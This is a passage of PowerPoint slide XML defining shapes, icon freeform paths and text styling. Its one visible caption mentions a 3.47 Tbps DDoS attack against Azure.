              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB30AAFC-BD91-4F83-8677-71887B5DA70E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7074949" y="2082306"/>
            <a:ext cx="1162050" cy="495300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1162050"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 495300"/>
              <a:gd name="connsiteX1" fmla="*/ 679450 w 1162050"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 495300"/>
              <a:gd name="connsiteX2" fmla="*/ 1162050 w 1162050"/>
              <a:gd name="connsiteY2" fmla="*/ 495300 h 495300"/>
              <a:gd name="connsiteX3" fmla="*/ 1162050 w 116205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1162050" h="495300">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="679450" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1162050" y="495300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1162050" y="495300"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFil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Tahoma"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="AutoShape 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1A5F30B-7C7E-467A-83C0-51B4FD320103}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8438288" y="1883556"/>
            <a:ext cx="365545" cy="399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4A4A4A"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Tahoma"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Ellipse 85">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8332EE05-034A-4B61-8434-8DE7F9E5B8D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8257123" y="1724613"/>
            <a:ext cx="720000" cy="7200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Tahoma"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Ellipse 92">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58BE3DBF-A3E3-4188-9114-3CB160F0FB66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8257123" y="5001213"/>
            <a:ext cx="720000" cy="7200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Tahoma"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="AutoShape 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36BBFA97-43F1-4DC4-8083-F14EFD17B9BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8442833" y="3630118"/>
            <a:ext cx="360363"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4A4A4A"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Tahoma"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="Ellipse 99">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B4F1CEC-2C90-406B-978E-E0280C057E30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8257123" y="3367676"/>
            <a:ext cx="720000" cy="720000"/>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Tahoma"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E18B2478-9A8C-4936-9F82-3C22F83EDA0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="966540" y="4934092"/>
            <a:ext cx="2340000" cy="1080000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0" kern="1200" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1100" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="538163" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="538163" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="198000" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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494949"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="nb-NO" sz="16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DDoS attack measures at 3,47 TBps against Azure </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Tahoma"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="58" name="Group 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{916D38D4-7D63-4A48-8359-EB49AC2A44C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3401846" y="5197942"/>
            <a:ext cx="338609" cy="330310"/>
            <a:chOff x="15027822" y="4320635"/>
            <a:chExt cx="656163" cy="640081"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="59" name="Freeform 775">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0B310C2-A2C9-6C47-847D-6C6783F72973}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="15027822" y="4557046"/>
              <a:ext cx="656163" cy="403670"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1490 w 1648"/>
                <a:gd name="T1" fmla="*/ 1013 h 1013"/>
                <a:gd name="T2" fmla="*/ 158 w 1648"/>
                <a:gd name="T3" fmla="*/ 1013 h 1013"/>
                <a:gd name="T4" fmla="*/ 0 w 1648"/>
                <a:gd name="T5" fmla="*/ 855 h 1013"/>
                <a:gd name="T6" fmla="*/ 0 w 1648"/>
                <a:gd name="T7" fmla="*/ 740 h 1013"/>
                <a:gd name="T8" fmla="*/ 26 w 1648"/>
                <a:gd name="T9" fmla="*/ 714 h 1013"/>
                <a:gd name="T10" fmla="*/ 51 w 1648"/>
                <a:gd name="T11" fmla="*/ 740 h 1013"/>
                <a:gd name="T12" fmla="*/ 51 w 1648"/>
                <a:gd name="T13" fmla="*/ 855 h 1013"/>
                <a:gd name="T14" fmla="*/ 158 w 1648"/>
                <a:gd name="T15" fmla="*/ 962 h 1013"/>
                <a:gd name="T16" fmla="*/ 1490 w 1648"/>
                <a:gd name="T17" fmla="*/ 962 h 1013"/>
                <a:gd name="T18" fmla="*/ 1597 w 1648"/>
                <a:gd name="T19" fmla="*/ 855 h 1013"/>
                <a:gd name="T20" fmla="*/ 1597 w 1648"/>
                <a:gd name="T21" fmla="*/ 25 h 1013"/>
                <a:gd name="T22" fmla="*/ 1622 w 1648"/>
                <a:gd name="T23" fmla="*/ 0 h 1013"/>
                <a:gd name="T24" fmla="*/ 1648 w 1648"/>
                <a:gd name="T25" fmla="*/ 25 h 1013"/>
                <a:gd name="T26" fmla="*/ 1648 w 1648"/>
                <a:gd name="T27" fmla="*/ 855 h 1013"/>
                <a:gd name="T28" fmla="*/ 1490 w 1648"/>
                <a:gd name="T29" fmla="*/ 1013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48" h="1013">
                  <a:moveTo>
                    <a:pt x="1490" y="1013"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="1013"/>
                    <a:pt x="158" y="1013"/>
                    <a:pt x="158" y="1013"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="1013"/>
                    <a:pt x="0" y="942"/>
                    <a:pt x="0" y="855"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="740"/>
                    <a:pt x="0" y="740"/>
                    <a:pt x="0" y="740"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="726"/>
                    <a:pt x="12" y="714"/>
                    <a:pt x="26" y="714"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="714"/>
                    <a:pt x="51" y="726"/>
                    <a:pt x="51" y="740"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="855"/>
                    <a:pt x="51" y="855"/>
                    <a:pt x="51" y="855"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="914"/>
                    <a:pt x="99" y="962"/>
                    <a:pt x="158" y="962"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1490" y="962"/>
                    <a:pt x="1490" y="962"/>
                    <a:pt x="1490" y="962"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1549" y="962"/>
                    <a:pt x="1597" y="914"/>
                    <a:pt x="1597" y="855"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1597" y="25"/>
                    <a:pt x="1597" y="25"/>
                    <a:pt x="1597" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1597" y="11"/>
                    <a:pt x="1608" y="0"/>
                    <a:pt x="1622" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1636" y="0"/>
                    <a:pt x="1648" y="11"/>
                    <a:pt x="1648" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1648" y="855"/>
                    <a:pt x="1648" y="855"/>
                    <a:pt x="1648" y="855"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1648" y="942"/>
                    <a:pt x="1577" y="1013"/>
                    <a:pt x="1490" y="10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64" name="Freeform 776">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C3360C4-B9D3-4F42-A5D9-4E050A3A8F79}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="15027822" y="4560262"/>
              <a:ext cx="19299" cy="250886"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 26 w 51"/>
                <a:gd name="T1" fmla="*/ 631 h 631"/>
                <a:gd name="T2" fmla="*/ 0 w 51"/>
                <a:gd name="T3" fmla="*/ 606 h 631"/>
                <a:gd name="T4" fmla="*/ 0 w 51"/>
                <a:gd name="T5" fmla="*/ 26 h 631"/>
                <a:gd name="T6" fmla="*/ 26 w 51"/>
                <a:gd name="T7" fmla="*/ 0 h 631"/>
                <a:gd name="T8" fmla="*/ 51 w 51"/>
                <a:gd name="T9" fmla="*/ 26 h 631"/>
                <a:gd name="T10" fmla="*/ 51 w 51"/>
                <a:gd name="T11" fmla="*/ 606 h 631"/>
                <a:gd name="T12" fmla="*/ 26 w 51"/>
                <a:gd name="T13" fmla="*/ 631 h 631"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T10" y="T11"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T12" y="T13"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="51" h="631">
                  <a:moveTo>
                    <a:pt x="26" y="631"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="631"/>
                    <a:pt x="0" y="620"/>
                    <a:pt x="0" y="606"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="26"/>
                    <a:pt x="0" y="26"/>
                    <a:pt x="0" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="12"/>
                    <a:pt x="12" y="0"/>
                    <a:pt x="26" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="0"/>
                    <a:pt x="51" y="12"/>
                    <a:pt x="51" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="606"/>
                    <a:pt x="51" y="606"/>
                    <a:pt x="51" y="606"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="620"/>
                    <a:pt x="40" y="631"/>
                    <a:pt x="26" y="6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65" name="Freeform 777">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A913C44A-A82A-624B-BB39-ADA6B59D6847}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="15248151" y="4320635"/>
              <a:ext cx="209072" cy="69155"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 28 w 526"/>
                <a:gd name="T1" fmla="*/ 173 h 173"/>
                <a:gd name="T2" fmla="*/ 9 w 526"/>
                <a:gd name="T3" fmla="*/ 165 h 173"/>
                <a:gd name="T4" fmla="*/ 9 w 526"/>
                <a:gd name="T5" fmla="*/ 130 h 173"/>
                <a:gd name="T6" fmla="*/ 10 w 526"/>
                <a:gd name="T7" fmla="*/ 129 h 173"/>
                <a:gd name="T8" fmla="*/ 526 w 526"/>
                <a:gd name="T9" fmla="*/ 128 h 173"/>
                <a:gd name="T10" fmla="*/ 510 w 526"/>
                <a:gd name="T11" fmla="*/ 148 h 173"/>
                <a:gd name="T12" fmla="*/ 493 w 526"/>
                <a:gd name="T13" fmla="*/ 166 h 173"/>
                <a:gd name="T14" fmla="*/ 45 w 526"/>
                <a:gd name="T15" fmla="*/ 166 h 173"/>
                <a:gd name="T16" fmla="*/ 28 w 526"/>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173">
                  <a:moveTo>
                    <a:pt x="28" y="173"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="173"/>
                    <a:pt x="14" y="170"/>
                    <a:pt x="9" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="155"/>
                    <a:pt x="0" y="140"/>
                    <a:pt x="9" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="129"/>
                    <a:pt x="10" y="129"/>
                    <a:pt x="10" y="129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="161" y="0"/>
                    <a:pt x="377" y="0"/>
                    <a:pt x="526" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="510" y="148"/>
                    <a:pt x="510" y="148"/>
                    <a:pt x="510" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="493" y="166"/>
                    <a:pt x="493" y="166"/>
                    <a:pt x="493" y="166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="363" y="55"/>
                    <a:pt x="175" y="55"/>
                    <a:pt x="45" y="166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="170"/>
                    <a:pt x="34" y="173"/>
                    <a:pt x="28"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66" name="Freeform 778">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D899A5E-4BAE-F74D-971C-180A651E109F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="15027822" y="4479850"/>
              <a:ext cx="656163" cy="307175"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 828 w 1648"/>
                <a:gd name="T1" fmla="*/ 774 h 774"/>
                <a:gd name="T2" fmla="*/ 676 w 1648"/>
                <a:gd name="T3" fmla="*/ 724 h 774"/>
                <a:gd name="T4" fmla="*/ 11 w 1648"/>
                <a:gd name="T5" fmla="*/ 246 h 774"/>
                <a:gd name="T6" fmla="*/ 0 w 1648"/>
                <a:gd name="T7" fmla="*/ 226 h 774"/>
                <a:gd name="T8" fmla="*/ 9 w 1648"/>
                <a:gd name="T9" fmla="*/ 206 h 774"/>
                <a:gd name="T10" fmla="*/ 203 w 1648"/>
                <a:gd name="T11" fmla="*/ 40 h 774"/>
                <a:gd name="T12" fmla="*/ 239 w 1648"/>
                <a:gd name="T13" fmla="*/ 43 h 774"/>
                <a:gd name="T14" fmla="*/ 236 w 1648"/>
                <a:gd name="T15" fmla="*/ 78 h 774"/>
                <a:gd name="T16" fmla="*/ 66 w 1648"/>
                <a:gd name="T17" fmla="*/ 224 h 774"/>
                <a:gd name="T18" fmla="*/ 705 w 1648"/>
                <a:gd name="T19" fmla="*/ 683 h 774"/>
                <a:gd name="T20" fmla="*/ 951 w 1648"/>
                <a:gd name="T21" fmla="*/ 683 h 774"/>
                <a:gd name="T22" fmla="*/ 1581 w 1648"/>
                <a:gd name="T23" fmla="*/ 224 h 774"/>
                <a:gd name="T24" fmla="*/ 1376 w 1648"/>
                <a:gd name="T25" fmla="*/ 48 h 774"/>
                <a:gd name="T26" fmla="*/ 1373 w 1648"/>
                <a:gd name="T27" fmla="*/ 12 h 774"/>
                <a:gd name="T28" fmla="*/ 1409 w 1648"/>
                <a:gd name="T29" fmla="*/ 9 h 774"/>
                <a:gd name="T30" fmla="*/ 1639 w 1648"/>
                <a:gd name="T31" fmla="*/ 206 h 774"/>
                <a:gd name="T32" fmla="*/ 1647 w 1648"/>
                <a:gd name="T33" fmla="*/ 226 h 774"/>
                <a:gd name="T34" fmla="*/ 1637 w 1648"/>
                <a:gd name="T35" fmla="*/ 246 h 774"/>
                <a:gd name="T36" fmla="*/ 981 w 1648"/>
                <a:gd name="T37" fmla="*/ 724 h 774"/>
                <a:gd name="T38" fmla="*/ 828 w 1648"/>
                <a:gd name="T39" fmla="*/ 774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8" h="774">
                  <a:moveTo>
                    <a:pt x="828" y="774"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="775" y="774"/>
                    <a:pt x="721" y="757"/>
                    <a:pt x="676" y="724"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="246"/>
                    <a:pt x="11" y="246"/>
                    <a:pt x="11" y="246"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="241"/>
                    <a:pt x="0" y="234"/>
                    <a:pt x="0" y="226"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="219"/>
                    <a:pt x="3" y="211"/>
                    <a:pt x="9" y="206"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="40"/>
                    <a:pt x="203" y="40"/>
                    <a:pt x="203" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="214" y="31"/>
                    <a:pt x="230" y="32"/>
                    <a:pt x="239" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="248" y="53"/>
                    <a:pt x="247" y="69"/>
                    <a:pt x="236" y="78"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="224"/>
                    <a:pt x="66" y="224"/>
                    <a:pt x="66" y="224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="705" y="683"/>
                    <a:pt x="705" y="683"/>
                    <a:pt x="705" y="683"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="779" y="736"/>
                    <a:pt x="878" y="736"/>
                    <a:pt x="951" y="683"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1581" y="224"/>
                    <a:pt x="1581" y="224"/>
                    <a:pt x="1581" y="224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1376" y="48"/>
                    <a:pt x="1376" y="48"/>
                    <a:pt x="1376" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1365" y="39"/>
                    <a:pt x="1364" y="23"/>
                    <a:pt x="1373" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1382" y="1"/>
                    <a:pt x="1398" y="0"/>
                    <a:pt x="1409" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1639" y="206"/>
                    <a:pt x="1639" y="206"/>
                    <a:pt x="1639" y="206"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1644" y="211"/>
                    <a:pt x="1648" y="218"/>
                    <a:pt x="1647" y="226"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1647" y="234"/>
                    <a:pt x="1643" y="241"/>
                    <a:pt x="1637" y="246"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="981" y="724"/>
                    <a:pt x="981" y="724"/>
                    <a:pt x="981" y="724"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="935" y="757"/>
                    <a:pt x="882" y="774"/>
                    <a:pt x="828" y="7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68" name="Freeform 779">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0344EB3D-D027-E44E-B73F-43FDB1C0C0B8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
